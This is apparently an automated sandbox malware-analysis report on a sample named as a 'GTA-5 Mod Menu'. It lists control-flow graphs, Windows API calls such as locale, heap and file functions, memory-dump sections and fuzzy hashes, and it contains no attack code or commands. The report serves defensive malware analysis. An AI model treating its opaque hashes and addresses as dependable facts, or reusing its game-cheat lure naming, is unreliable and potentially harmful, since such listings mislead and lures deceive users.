                                                                    control_flow_graph 278 f97152-f97157 279 f97159-f97171 278->279 280 f9717f-f97188 279->280 281 f97173-f97177 279->281 283 f9719a 280->283 284 f9718a-f9718d 280->284 281->280 282 f97179-f9717d 281->282 285 f971f4-f971f8 282->285 288 f9719c-f971a9 GetStdHandle 283->288 286 f9718f-f97194 284->286 287 f97196-f97198 284->287 285->279 289 f971fe-f97201 285->289 286->288 287->288 290 f971ab-f971ad 288->290 291 f971d6-f971e8 288->291 290->291 293 f971af-f971b8 GetFileType 290->293 291->285 292 f971ea-f971ed 291->292 292->285 293->291 294 f971ba-f971c3 293->294 295 f971cb-f971ce 294->295 296 f971c5-f971c9 294->296 295->285 297 f971d0-f971d4 295->297 296->285 297->285
                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,00F97041,00FAFCD8,0000000C), ref: 00F9719E
                                                                    • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,00F97041,00FAFCD8,0000000C), ref: 00F971B0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: FileHandleType
                                                                    • String ID:
                                                                    • API String ID: 3000768030-0
                                                                    • Opcode ID: 337b55ce26c259f29cd0f7532adc8f512cbb153b5cd7e76a08b3c680ac2cd961
                                                                    • Instruction ID: c0ae0e900bb5420f438c9831141562b59c744c67630c6f6e8e0d705325062d21
                                                                    • Opcode Fuzzy Hash: 337b55ce26c259f29cd0f7532adc8f512cbb153b5cd7e76a08b3c680ac2cd961
                                                                    • Instruction Fuzzy Hash: C811D67292C7818BEF306E3F8C88B227AA4A752370B380759D5B6865F1D234D8C6F641

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32 ref: 00F82038
                                                                    • GetModuleFileNameW.KERNEL32 ref: 00F82058
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: Module$FileHandleName
                                                                    • String ID:
                                                                    • API String ID: 4146042529-0
                                                                    • Opcode ID: c12183af03f5f7b4a5856dcf074f401a15cd265dbf1c93378c095bb6cce19814
                                                                    • Instruction ID: ac54c20dc3fece82805fc3fdc0f7723300cb21b4a6f50f377704910bf30677ec
                                                                    • Opcode Fuzzy Hash: c12183af03f5f7b4a5856dcf074f401a15cd265dbf1c93378c095bb6cce19814
                                                                    • Instruction Fuzzy Hash: 54011AB09052088FCB14EF68D94929EBBF8BF08304F4145ADE48983341EB349A889F92

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 305 f964b3-f964c2 call f96822 308 f964eb-f96505 call f9654f LCMapStringW 305->308 309 f964c4-f964e9 LCMapStringEx 305->309 313 f9650b-f9650d 308->313 309->313
                                                                    APIs
                                                                    • LCMapStringEx.KERNELBASE(?,00F96EDA,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 00F964E7
                                                                    • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,-00000008,-00000008,?,00F96EDA,?,?,-00000008,?,00000000), ref: 00F96505
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: String
                                                                    • String ID:
                                                                    • API String ID: 2568140703-0
                                                                    • Opcode ID: 2288934150230d9a235b32c2f2a0eb313b432e62fe6e7bdaf031ab57bf73ef72
                                                                    • Instruction ID: aba5626c8a4cfbe798651a80924da75ee1ac8498f09291949187ad509dc94cd2
                                                                    • Opcode Fuzzy Hash: 2288934150230d9a235b32c2f2a0eb313b432e62fe6e7bdaf031ab57bf73ef72
                                                                    • Instruction Fuzzy Hash: 48F0243640021ABBDF226FA4EC159DE3E66AF487A0F098510FA19A5120CB36D971BB90

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 314 f95677-f95680 315 f956af-f956b0 314->315 316 f95682-f95695 RtlFreeHeap 314->316 316->315 317 f95697-f956ae GetLastError call f9131d call f912d4 316->317 317->315
                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000000,00000000,?,00F99A24,?,00000000,?,?,00F996C4,?,00000007,?,?,00F9A00A,?,?), ref: 00F9568D
                                                                    • GetLastError.KERNEL32(?,?,00F99A24,?,00000000,?,?,00F996C4,?,00000007,?,?,00F9A00A,?,?), ref: 00F95698
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 485612231-0
                                                                    • Opcode ID: 0efe561e4a5ee6775f2cd09ebb7dee3204f89f314662a7e2cacc0ea643ac54eb
                                                                    • Instruction ID: 4c0e54729e22f3322f16f69872d06b6ec465e35197b04708374985aebd42a70a
                                                                    • Opcode Fuzzy Hash: 0efe561e4a5ee6775f2cd09ebb7dee3204f89f314662a7e2cacc0ea643ac54eb
                                                                    • Instruction Fuzzy Hash: 1FE08C36500659ABEF222FE4EC08B997BA8AB01B61F504020F60886460CB388850EB95

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 322 f814c0-f8152f call f932f0 call f83030 327 f81560-f8156a 322->327 328 f81535-f81555 call f83030 322->328 330 f81597-f815be call f83050 call f83160 327->330 336 f8155b 328->336 337 f8156f-f81592 call f83030 328->337 340 f815d2-f8162c call f83330 call f83180 call f83360 call f833d0 330->340 341 f815c4-f815cd 330->341 336->327 337->330 358 f816e1 340->358 359 f81632 340->359 343 f818b5-f81903 call f835b0 call f83600 341->343 361 f816e6-f816ef 358->361 360 f81637-f81643 359->360 362 f81649-f816b1 call f83410 call f834e0 call f83430 call f83500 call f833f0 360->362 363 f816dc 360->363 364 f816f5-f81704 361->364 365 f81707-f8170c 361->365 409 f816bc-f816c5 362->409 410 f816b7-f816d7 362->410 363->358 364->365 367 f81712-f817c0 365->367 368 f81717-f8175c call f83410 call f83510 call f83430 365->368 373 f81891-f818b0 call f83560 367->373 374 f817c6 367->374 394 f81761-f8178d call f83500 call f833f0 368->394 373->343 385 f81835-f8183c 373->385 377 f817cb-f817d7 374->377 381 f8188c 377->381 382 f817dd-f81820 call f83410 call f834e0 call f83430 377->382 381->373 382->385 407 f81841-f81861 call f83500 call f833f0 382->407 385->343 413 f81798-f8179e 394->413 414 f81793 394->414 419 f8186c-f81875 407->419 420 f81867-f81887 407->420 409->363 410->360 416 f817a1-f817b7 413->416 414->416 416->361 419->381 420->377
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: _strlen
                                                                    • String ID:
                                                                    • API String ID: 4218353326-0
                                                                    • Opcode ID: 8f7c332d185b57f49f5d8f2f66a081a489d6a28c52888f054357f50f50a975a0
                                                                    • Instruction ID: be63d8ebeb5556df636c95843528592b9e2ce8911e3883b9b3c85dafee3f76b1
                                                                    • Opcode Fuzzy Hash: 8f7c332d185b57f49f5d8f2f66a081a489d6a28c52888f054357f50f50a975a0
                                                                    • Instruction Fuzzy Hash: DDD12875604B408FC724EF38C555AAABBE0BF48714F148A1DE8878BB61E739F905EB41

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 422 f977f7-f97819 423 f9792b-f97951 422->423 424 f9781f-f97831 GetCPInfo 422->424 425 f97956-f9795b 423->425 424->423 426 f97837-f9783e 424->426 427 f9795d-f97963 425->427 428 f97965-f9796b 425->428 429 f97840-f9784a 426->429 430 f97973-f97975 427->430 431 f9796d-f97970 428->431 432 f97977 428->432 429->429 433 f9784c-f9785f 429->433 434 f97979-f9798b 430->434 431->430 432->434 435 f97880-f97882 433->435 434->425 438 f9798d-f9799b call f87191 434->438 436 f97861-f97868 435->436 437 f97884-f978bb call f96ca0 call f96da1 435->437 441 f97877-f97879 436->441 448 f978c0-f978ee call f96da1 437->448 442 f9787b-f9787e 441->442 443 f9786a-f9786c 441->443 442->435 443->442 447 f9786e-f97876 443->447 447->441 451 f978f0-f978fb 448->451 452 f97909-f9790c 451->452 453 f978fd-f97907 451->453 455 f9791a 452->455 456 f9790e-f97918 452->456 454 f9791c-f97927 453->454 454->451 457 f97929 454->457 455->454 456->454 457->438
                                                                    APIs
                                                                    • GetCPInfo.KERNEL32(00000083,?,00000005,00F97678,?), ref: 00F97829
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: Info
                                                                    • String ID:
                                                                    • API String ID: 1807457897-0
                                                                    • Opcode ID: c0ff8df530ea908f4e5218e950c0189a0fc0998ace679dfab9569355d742f56b
                                                                    • Instruction ID: 992db4bf2723264f36eacfec941bf270efafaea75f4d0fff6bf01a27c2cdfb58
                                                                    • Opcode Fuzzy Hash: c0ff8df530ea908f4e5218e950c0189a0fc0998ace679dfab9569355d742f56b
                                                                    • Instruction Fuzzy Hash: AE514CB191C358AEEF119A29CC84BE5BBADEB05314F2401E9E499C7142D3359D45EF60
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0f1e0903b9924b7b3bff3da678a84673d618ba857dff261bab6bac2cbfeb03c2
                                                                    • Instruction ID: 0a08fea234bc47bebbf3a06f537a46345b126f2657677ef04766c2c50f2efb7b
                                                                    • Opcode Fuzzy Hash: 0f1e0903b9924b7b3bff3da678a84673d618ba857dff261bab6bac2cbfeb03c2
                                                                    • Instruction Fuzzy Hash: 4E419372A0011AAFCF14EF68C8909EDB7B9FF08350F940165E541E7640EB31ED46EB90
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4dec97a39281c0a2d294626ace38d8c9a19108ee8a9411bb59f28cae7a6a8bfe
                                                                    • Instruction ID: b171aa5d489f69bf7f5a1024dcb7bb92c7e11fb06636c0f30d75d85dd7476616
                                                                    • Opcode Fuzzy Hash: 4dec97a39281c0a2d294626ace38d8c9a19108ee8a9411bb59f28cae7a6a8bfe
                                                                    • Instruction Fuzzy Hash: 5101B533610219ABAF168FA8EC85E5673AAFBC1734B244224F914CB594DE30E810BFD1
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000000,00F97635,?,?,00F97635,00000220,?,?,?), ref: 00F956E3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: 8de361e682a6c922f29c3844b56aa229065cb4a9bc4753171a231c621e1c2fcd
                                                                    • Instruction ID: be0a34923ab9e63c7b13737ae06203314e9a72d9d654c4530f61e78e6efcbb3d
                                                                    • Opcode Fuzzy Hash: 8de361e682a6c922f29c3844b56aa229065cb4a9bc4753171a231c621e1c2fcd
                                                                    • Instruction Fuzzy Hash: C3E06531905A2557FF237669DC00B9A7A48AF41FB1F954131EC1596090DB54DC04B7A4
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleFree
                                                                    • String ID:
                                                                    • API String ID: 771614528-0
                                                                    • Opcode ID: b0b5446b590a0d6b9cc7c7c7bf3d777aa201a85156f451095a5b989726163efc
                                                                    • Instruction ID: 69b82edc4fd8970f3e646fc5317297419a8db73136c8324f01c1f49d24219bd5
                                                                    • Opcode Fuzzy Hash: b0b5446b590a0d6b9cc7c7c7bf3d777aa201a85156f451095a5b989726163efc
                                                                    • Instruction Fuzzy Hash: 3CC0127010010CABD740EF94DC0578D77ECDB04220F004021FC0DC7300DA79EA409652
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: __floor_pentium4
                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                    • API String ID: 4168288129-2761157908
                                                                    • Opcode ID: 5e106abc945bc25e04b35653f8de1a6470350dda29a8994a36414c69167abd55
                                                                    • Instruction ID: c9fd0c3202ee5147d6c639f6923070c177321bbc7d352857fd25b3e8abe0c706
                                                                    • Opcode Fuzzy Hash: 5e106abc945bc25e04b35653f8de1a6470350dda29a8994a36414c69167abd55
                                                                    • Instruction Fuzzy Hash: C5D25BB2E082288FDB64CE28DD407EAB7B5FB46315F1541EAD40DE7240DB78AE859F41
                                                                    APIs
                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,00F9AB2D,00000002,00000000,?,?,?,00F9AB2D,?,00000000), ref: 00F9B210
                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,00F9AB2D,00000002,00000000,?,?,?,00F9AB2D,?,00000000), ref: 00F9B239
                                                                    • GetACP.KERNEL32(?,?,00F9AB2D,?,00000000), ref: 00F9B24E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID: ACP$OCP
                                                                    • API String ID: 2299586839-711371036
                                                                    • Opcode ID: 83ce1b187351f555520f7ed8a2d5b7d489f80fe1e6b4fd7eeec91ccd592a8201
                                                                    • Instruction ID: 9203ef6fc9630091ae59231822bb246e077fe8d5dff5f75cc10b9de42de5c01d
                                                                    • Opcode Fuzzy Hash: 83ce1b187351f555520f7ed8a2d5b7d489f80fe1e6b4fd7eeec91ccd592a8201
                                                                    • Instruction Fuzzy Hash: ED21D622E04100A6FF358F55EA00BAB73A7EF90B30B564424E90AD7104E732DD80F350
                                                                    APIs
                                                                      • Part of subcall function 00F9590A: GetLastError.KERNEL32(00000000,?,00F97C8D), ref: 00F9590E
                                                                      • Part of subcall function 00F9590A: SetLastError.KERNEL32(00000000,?,?,00000028,00F91F53), ref: 00F959B0
                                                                    • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00F9AAFF
                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 00F9AB3D
                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 00F9AB50
                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00F9AB98
                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00F9ABB3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                    • String ID:
                                                                    • API String ID: 415426439-0
                                                                    • Opcode ID: d96bd4a143244115fde5f5f8bdc145e5ecff8f360c565f920c7763ac8d9a33f0
                                                                    • Instruction ID: 87f2566d22180582d4e9b9397b96ef545291b36812a556565798de6efd7a2706
                                                                    • Opcode Fuzzy Hash: d96bd4a143244115fde5f5f8bdc145e5ecff8f360c565f920c7763ac8d9a33f0
                                                                    • Instruction Fuzzy Hash: 755180B2E00219ABFF14DFA4CC85AAA73B9FF44710F144465E911E7190E774DA44EBA2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
                                                                    • Instruction ID: a0f2cbffd4b291ccbac7c0b20493b91d22184ccd65307a441dcd2bc566bb258b
                                                                    • Opcode Fuzzy Hash: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
                                                                    • Instruction Fuzzy Hash: C0021DB1E012199BEF14CFA9C9806AEB7F1FF48324F258269E519E7341D731AE41DB90
                                                                    APIs
                                                                    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F9B849
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
